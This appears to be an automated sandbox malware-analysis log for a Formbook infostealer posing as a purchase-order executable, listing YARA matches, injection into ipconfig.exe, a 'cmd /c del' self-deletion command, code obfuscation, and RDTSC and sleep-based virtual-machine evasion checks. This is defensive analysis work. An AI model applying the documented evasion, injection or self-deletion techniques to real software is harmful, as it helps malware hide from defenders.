Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9730 NtQueryVirtualMemory, 5_2_02EB9730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EBA710 NtOpenProcessToken, 5_2_02EBA710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB95F0 NtQueryInformationFile, 5_2_02EB95F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9560 NtWriteFile, 5_2_02EB9560
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9520 NtWaitForSingleObject, 5_2_02EB9520
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EBAD30 NtSetContextThread, 5_2_02EBAD30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B17BA0 NtCreateFile, 5_2_02B17BA0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B17CD0 NtClose, 5_2_02B17CD0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B17C50 NtReadFile, 5_2_02B17C50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B17CCA NtClose, 5_2_02B17CCA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B17C4C NtReadFile, 5_2_02B17C4C
Detected potential crypto function
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E9969 0_2_013E9969
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E91F9 0_2_013E91F9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E8D64 0_2_013E8D64
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E9D51 0_2_013E9D51
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E9597 0_2_013E9597
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E07F6 0_2_013E07F6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041C16E 1_2_0041C16E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00408A40 1_2_00408A40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00408A3B 1_2_00408A3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041C52F 1_2_0041C52F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00402D8A 1_2_00402D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041BF03 1_2_0041BF03
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B090 1_2_00F9B090
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041002 1_2_01041002
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105E824 1_2_0105E824
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010520A8 1_2_010520A8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010528EC 1_2_010528EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8F900 1_2_00F8F900
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01052B28 1_2_01052B28
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104DBD2 1_2_0104DBD2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010403DA 1_2_010403DA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103FA2B 1_2_0103FA2B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBEBB0 1_2_00FBEBB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010522AE 1_2_010522AE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAAB40 1_2_00FAAB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01052D07 1_2_01052D07
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01051D55 1_2_01051D55
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010525DD 1_2_010525DD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9841F 1_2_00F9841F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9D5E0 1_2_00F9D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104D466 1_2_0104D466
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2581 1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F80D20 1_2_00F80D20
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA6E30 1_2_00FA6E30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105DFCE 1_2_0105DFCE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01051FF1 1_2_01051FF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104D616 1_2_0104D616
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01052EF7 1_2_01052EF7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F422AE 5_2_02F422AE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F2FA2B 5_2_02F2FA2B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3DBD2 5_2_02F3DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F303DA 5_2_02F303DA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAEBB0 5_2_02EAEBB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AB40 5_2_02E9AB40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F42B28 5_2_02F42B28
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F428EC 5_2_02F428EC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA20A0 5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F420A8 5_2_02F420A8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8B090 5_2_02E8B090
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F4E824 5_2_02F4E824
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F31002 5_2_02F31002
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7F900 5_2_02E7F900
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F42EF7 5_2_02F42EF7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E96E30 5_2_02E96E30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3D616 5_2_02F3D616
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F41FF1 5_2_02F41FF1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F4DFCE 5_2_02F4DFCE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3D466 5_2_02F3D466
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8841F 5_2_02E8841F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8D5E0 5_2_02E8D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F425DD 5_2_02F425DD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA2581 5_2_02EA2581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F41D55 5_2_02F41D55
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E70D20 5_2_02E70D20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F42D07 5_2_02F42D07
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B08A3B 5_2_02B08A3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B08A40 5_2_02B08A40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1C16E 5_2_02B1C16E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B02FB0 5_2_02B02FB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1BF03 5_2_02B1BF03
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B02D90 5_2_02B02D90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B02D8A 5_2_02B02D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1C52F 5_2_02B1C52F
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: String function: 013E0550 appears 47 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: String function: 013EDBFD appears 32 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: String function: 013DB9F5 appears 624 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: String function: 00F8B150 appears 54 times
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 02E7B150 appears 48 times
Sample file is different than original file name gathered from version info
Source: Purchase Order 40,7045$.exe, 00000000.00000003.237695476.000000000332F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000001.00000002.273903845.0000000000F27000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameipconfig.exej% vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000001.00000002.274263371.000000000120F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
Yara signature match
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/0@17/13
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
Source: Purchase Order 40,7045$.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Purchase Order 40,7045$.exe Virustotal: Detection: 43%
Source: Purchase Order 40,7045$.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe File read: C:\Users\user\Desktop\Purchase Order 40,7045$.exe
Source: unknown Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: unknown Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: Purchase Order 40,7045$.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
Source: Binary string: ipconfig.pdbGCTL source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: Purchase Order 40,7045$.exe, 00000000.00000003.240059107.0000000003210000.00000004.00000001.sdmp, Purchase Order 40,7045$.exe, 00000001.00000002.274071356.000000000107F000.00000040.00000001.sdmp, ipconfig.exe, 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Purchase Order 40,7045$.exe, ipconfig.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf, 0_2_013D7FB0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E0595 push ecx; ret 0_2_013E05A8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013DD44F push ecx; ret 0_2_013DD462
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00415913 push edx; retf 1_2_00415915
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041AC62 push D8D19732h; iretd 1_2_0041AC69
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00414D57 push esi; retf 1_2_00414D58
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041AD65 push eax; ret 1_2_0041ADB8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00414DEA push eax; ret 1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041ADB2 push eax; ret 1_2_0041ADB8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041ADBB push eax; ret 1_2_0041AE22
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00414E7E push eax; ret 1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041AE1C push eax; ret 1_2_0041AE22
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00414E24 push eax; ret 1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0040FF92 push 00000033h; iretd 1_2_0040FF98
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FDD0D1 push ecx; ret 1_2_00FDD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02ECD0D1 push ecx; ret 5_2_02ECD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B15913 push edx; retf 5_2_02B15915
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B14E24 push eax; ret 5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1AE1C push eax; ret 5_2_02B1AE22
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B14E7E push eax; ret 5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B0FF92 push 00000033h; iretd 5_2_02B0FF98
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1AC62 push D8D19732h; iretd 5_2_02B1AC69
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1ADB2 push eax; ret 5_2_02B1ADB8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1ADBB push eax; ret 5_2_02B1AE22
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B14DEA push eax; ret 5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1AD65 push eax; ret 5_2_02B1ADB8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B14D57 push esi; retf 5_2_02B14D58

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings
Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_004086A0 rdtsc 1_2_004086A0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5636 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160 Thread sleep time: -48000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
